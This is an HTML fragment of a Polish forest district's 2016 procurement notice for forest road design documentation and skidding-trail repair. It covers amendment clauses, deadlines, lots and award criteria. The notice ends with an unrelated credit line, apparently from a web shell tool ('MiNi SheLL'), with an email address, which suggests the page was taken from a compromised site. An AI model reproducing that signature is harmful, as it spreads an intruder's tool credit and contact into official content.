a)	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania Umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę,
b)	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę,
1.3.	Zamawiający przewiduje możliwość rezygnacji z realizacji części przedmiotu Umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z Umowy planowanymi świadczeniami.
1.4.	Zamawiający przewiduje możliwość zmiany Umowy w sytuacji zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływa na realizację przedmiotu Umowy lub świadczenia stron bądź przepisów wewnętrznych obowiązujących w PGL LP (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).
1.5.	Zamawiający przewiduje możliwość zmiany Umowy w sytuacji powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.
1.6.	Zamawiający przewiduje możliwość zmiany Umowy w razie zaistnienia zdarzeń niezależnych od Stron, po dacie zawarcia Umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań- strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu Umowy. Dotyczy to w szczególności opóźnień wynikających z niezawinionych przez Wykonawcę problemów formalno - prawnych, m.in. konieczności oczekiwania na opinie lub decyzje organów administracyjnych.
2.	Wszystkie powyższe postanowienia stanowią katalog istotnych zmian możliwych do wprowadzenia w treści Umowy. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody na ich wprowadzenie
3.	Zmiany Umowy dokonywane są w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.krakow.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Piwniczna
ul. Zagrody 32
33-350 Piwniczna-Zdrój
/ pokój nr 15 /.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2016 godzina 09:00, miejsce: Nadleśnictwo Piwniczna
ul. Zagrody 32
33-350 Piwniczna-Zdrój
/pokój nr 14 /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo kosztorysowej  dla  : 
I. Część  pierwsza :
1.	Budowa drogi Rzyczanów Dolinowa.
2.	Budowa drogi Runek Schronisko - Juchówki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.1.	Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót wraz z uzyskaniem pozwolenia na budowę.3.1.2.	Budowa drogi Rzyczanów Dolinowa - droga znajduje się w obrębie Rytro na terenie leśnictwa Rzyczanów, przyjęto jej orientacyjną długość na około 4100 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem. 3.1.4.	Budowa drogi Runek Schronisko - Juchówki - droga znajduje się w obrębie Rytro Leśnictwo Runek, przyjęto jej orientacyjną długość na około 3100 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.33.20.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Ilość wizyt w ramach nadzoru autorskiego - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część druga :
1.	Budowa drogi Majdan Dubne - Jaguszów.
2.	Budowa drogi Zubrzyk - Baraniacki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.1.	Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót wraz z uzyskaniem pozwolenia na budowę dla dróg.3.1.3.	Budowa drogi Majdan Dubne - Jaguszów - droga znajduje się w obrębie Muszyna na terenie leśnictwa Majdan, przyjęto jej orientacyjną długość na około 6000 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem.3.1.5.	Budowa drogi Zubrzyk Baraniacki - droga znajduje się w obrębie Rytro w Leśnictwie Zubrzyk, przyjęto jej orientacyjną długość na około 1200 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 73.32.20.00-1, 71.33.20.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Ilość wizyt w ramach nadzoru autorskiego - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część trzecia.
1.	Odtworzenie i remont szlaków zrywkowych na terenie Nadleśnictwa Piwniczna ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.6.	Odtworzenie i remont szlaków zrywkowych na terenie Nadleśnictwa Piwniczna - szlaki znajdują na terenie leśnictw : Szczawnik ( około 1600 mb ), Majerz ( około 2100 mb ), Jastrzębik ( około 800 mb ), Zubrzyk ( około 750 mb ), Łomnica ( około 800 mb ), Rzyczanów ( około 650 mb ), Roztoka Mała ( około 1200 mb ). Zakres, zasady i dane do  wykonania uproszczonej dokumentacji dotyczącej szlaków przedstawia załącznik nr 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com